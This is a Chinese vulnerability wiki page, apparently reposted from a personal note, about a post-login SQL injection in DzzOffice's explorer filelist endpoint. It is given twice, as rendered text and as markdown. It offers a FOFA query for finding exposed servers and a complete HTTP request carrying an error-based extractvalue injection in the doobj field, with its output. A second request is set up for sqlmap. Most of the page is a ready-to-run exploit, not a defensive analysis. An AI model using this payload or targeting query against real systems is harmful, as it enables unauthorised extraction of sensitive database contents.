fofamini-wiki

登录白背景

源码

DzzOffice 办公软件explorer存在后台SQL注入漏洞

一、漏洞简介

DzzOffice是一套开源办公套件，适用于企业、团队搭建自己的类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。DzzOffice办公软件/index.php?mod=explorer&op=dynamic&do=filelist接口处存在sql注入，攻击者可利用此漏洞获取数据库敏感信息。

二、影响版本

DzzOffice 办公软件

三、资产测绘

fofaicon_hash="-1961736892" && body="立即注册"
特征

四、漏洞复现

先注册用户登录系统获取cookie

使用上一步获取的cookie进行测试

POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=' and extractvalue(1,concat(0x7e,md5(1))) and '1'='1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0

c4ca4238a0b923820dcc509a6f75849

sqlmap

POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0

原文: https://www.yuque.com/xiaokp7/ocvun2/ya74hdqsmxtzaah8

# DzzOffice 办公软件explorer存在后台SQL注入漏洞

# 一、漏洞简介
DzzOffice是一套开源办公套件，适用于企业、团队搭建自己的 类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。DzzOffice办公软件/index.php?mod=explorer&op=dynamic&do=filelist接口处存在sql注入，攻击者可利用此漏洞获取数据库敏感信息。

# 二、影响版本

- DzzOffice 办公软件

# 三、资产测绘

- fofa`icon_hash="-1961736892" && body="立即注册"`
- 特征

![image.png](./img/Vc9a93IH8_aEUF5E/1713861649528-341a6025-97ab-439d-bf3f-fe540063d3f3-639447.png)

# 四、漏洞复现

1. 先注册用户登录系统获取cookie

![image.png](./img/Vc9a93IH8_aEUF5E/1713861803937-5ea3d9b4-7a40-4cf7-bac8-64312c019f17-496194.png)

2. 使用上一步获取的cookie进行测试
```java
POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=' and extractvalue(1,concat(0x7e,md5(1))) and '1'='1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0
```
![image.png](./img/Vc9a93IH8_aEUF5E/1713861880501-4e02c474-b60d-48c8-9881-ea2fec6ac9b4-059131.png)
```java
c4ca4238a0b923820dcc509a6f75849
```
sqlmap
```java
POST /index.php?mod=explorer&op=dynamic&do=filelist HTTP/1.1
Host: 
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: akJE_2132_saltkey=HZqrxEwb; akJE_2132_lastvisit=1713857672; akJE_2132_sid=q4j3kC; akJE_2132_lastact=1713861417%09misc.php%09sendwx; akJE_2132_sendmail=1; akJE_2132_seccodeSq4j3kC0=7bffgd26MmkE4-rOPQ9VfbprQFV8PwAkCCjx5QZA6zAv6YsABrolmPVfaWUsgEll8pBoBGXWYUfggaQvhpI; akJE_2132_ulastactivity=fc220wt12skKHnpuLZPCe1ubsZNVO6t2RNk2lO7fTViXnUmpvbEe; akJE_2132_auth=4b76EdNAavVzuCX3-9iIfBkeySRJefIX48pqsRTSbMgkVylOhANDtDsf_VKUbxlmOp2fLZ4IZGguwJGGT9WeXg; akJE_2132_explorer_index_isshow=show
Connection: close

doobj=1&doevent=&uids%5B%5D=1&startdate=&enddate=&disp=&asc=&page=0
```
![image.png](./img/Vc9a93IH8_aEUF5E/1713861903146-43e2d57c-f30e-42be-bce0-7e29b52a67bc-139881.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ya74hdqsmxtzaah8>